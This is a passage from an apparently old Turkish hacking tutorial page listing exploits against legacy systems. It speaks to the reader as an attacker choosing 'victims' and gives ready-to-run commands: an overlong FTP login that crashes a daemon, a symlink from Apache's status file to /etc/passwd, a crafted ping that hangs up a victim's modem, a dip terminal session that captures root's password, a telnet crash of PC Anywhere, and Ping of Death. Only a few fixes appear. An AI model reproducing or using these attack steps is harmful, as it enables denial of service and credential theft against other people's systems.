Bazı dergilerin bu daemon i dergi CD lerinde verdiklerini gördüm.Dolayısıyla
bir çok kelek bu programı kullanıcak :) Şimdiii....
İlk olarak ftp liyorsunuz(21).
Sonra username kısmına,
User : abelühübülüzappuruzuppurusizigidilamerlarhobadükvayanasına (yada bunun
kadar uzun ve aptal bir username :) )
giriyorsunuz,ve password kısmına da,
Password : abelühübülüzappuruzuppurusizigidilamerlarhobadükvayanasına (yada
bunun kadar uzun ve aptal bir password :) )
giriyorsunuz.
Ve sistemi aşşağı davet etmiş oluyoruz.
Tabii patch ide bulunuyor.(heheh)
+-+-+-+-+-+-+-+
Sistem : Linux
Program : Apache 1.1.3
Apache bayağı iyi,ve ünlü bir http daeomon'i,ama tabiiki,bug'i yok degil :)
Apache,çalıştırıldığında,"/tmp/apache_status" gibi bir dosya yaratıyor.Ve bu
dosya aptal gibi her link i izliyor.Bu dosyayı,mesela "/etc/passwd" e aşşağıda
görüldüğü gibi static linkleyebiliriz.
$ ln -s /etc/passwd /tmp/apache_status
+-+-+-+-+-+-+-+
Ping in modem üzerinde yetkisi
Bug,modem ile ilgili,"+ + +ATH0" komutu,modem e hangup sinyalini yollar.Siz
Windows ta,internet ten çıkmak için "Disconnect" e tıkladığınızda,aslında
modem e "+ + +ATH0" sinyalini yollamış, olursunuz.
Öncelikle kendimize bir kurban bulalım,sonra hemen komutumuzu yazalım :)
$ ping -p 2b2b2b415448300d 000.000.000.000
Tamam ,anladım,hiç birşey anlaşılmıyor komutdan,ama şimdi açıklayacağım :))
Karşı tarafa ping yolluyoruz.Ama bu garip bir paket boyutu,"2b2b2b415448300d".
Şöyle diyim,"2b2b2b" ,"+ + +ATH0" ın,HEX kod'u."000.000.000.000" yerine de
kurbanın IP sini yazıcaksınız.
Ayrıca , bu yolu kullanarak,kurbanın başka yerlere telefon etmesi gibi bir çok
şeyi yaptırabilirsiniz.
+-+-+-+-+-+-+-+
Sistem : Linux
Komut : /usr/sbin/dip
"dip",Linux ta bulunan bir Dial-up programı.George Staikos un "dip" te bulduğu
bug sayesinde herhangi bir kullanıcı "/dev" dizininde yetki sahibi olabiliyor.
Örnek :
$ whoami
kaiowas
$ cat < /dev/tty1 <------ root un loginlediği yer
bash: /dev/tty1: Permission denied <------ bunu aşabiliriz
$ dip -t
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP> port tty1
DIP> echo on
DIP> term
[ Entering TERMINAL mode. Use CTRL-] to get back ]
rootun_şifresi <------ şansınız varsa tabii :)
[ Back to LOCAL mode. ]
DIP> quit
$
Korunma :
chmod u-s /usr/sbin/dip
+-+-+-+-+-+-+-+
Program : PC Anywhere
Sistem : PC Anywhere 8.0 yüklü WinNT (Belki başkalarıda..)
PC Anywhere,bilindiği gibi bir çok dergi tarafından,dağıtılmış bir "share"
programı.. Cain Tasam,bu program üzerinde şöyle bir bug bulmuş.Eğer PC
Anywhere Server ının çalıştığı bir sistemin 5631. portuna telnetlerseniz.PC
Anywhere çöküyor.Bu,tamamen patchleri yüklü bir WinNT 4.0 sistemde bir kaç
kişi tarafından denendi.Deneyen kişilerin söylediğine göre sistem birinci
telnet sezonunda çökmüyor.İkinci ve üçüncü sezonlarda bu bug harekete geçiyor.
+-+-+-+-+-+-+-+
Komut : "Ping of Death"
Sistem : WinNT 3.51,4.0
Çok büyük paketteki pingler (PING -l 65527 -s 1 hostname) yada Underground
tabiriyle "Ölümün Ping'i" ,WinNT 3.51 sistemlerde o meşhur mavi ekran ı ortaya
çıkartıyor...
Aynı şeyi WinNT 4.0 da yiyor,fakat 3.51 kadar basit mavi ekran ı ortaya
çıkarmıyor. Windows based işletim sistemlerinde bu hata çok görülüyor.Bu bir
D.O.S atak sayılabilir. Denemek isteyenler için komut :
ping -l 65524 host.domain.com
Korunma : "Ölüm Ping'i" ni durdurmak o kadar zor değil.En son service packler
yada updateler kullanılarak bu sorunu ortadan kaldırabilirsiniz.
Windows NT 4.0 için,
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/
Windows NT 3.51 için,
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt351/
Windows 95 için,
http://www.microsoft.com/windows/common/contentW95UGA.htm
Ana Sayfaya Dön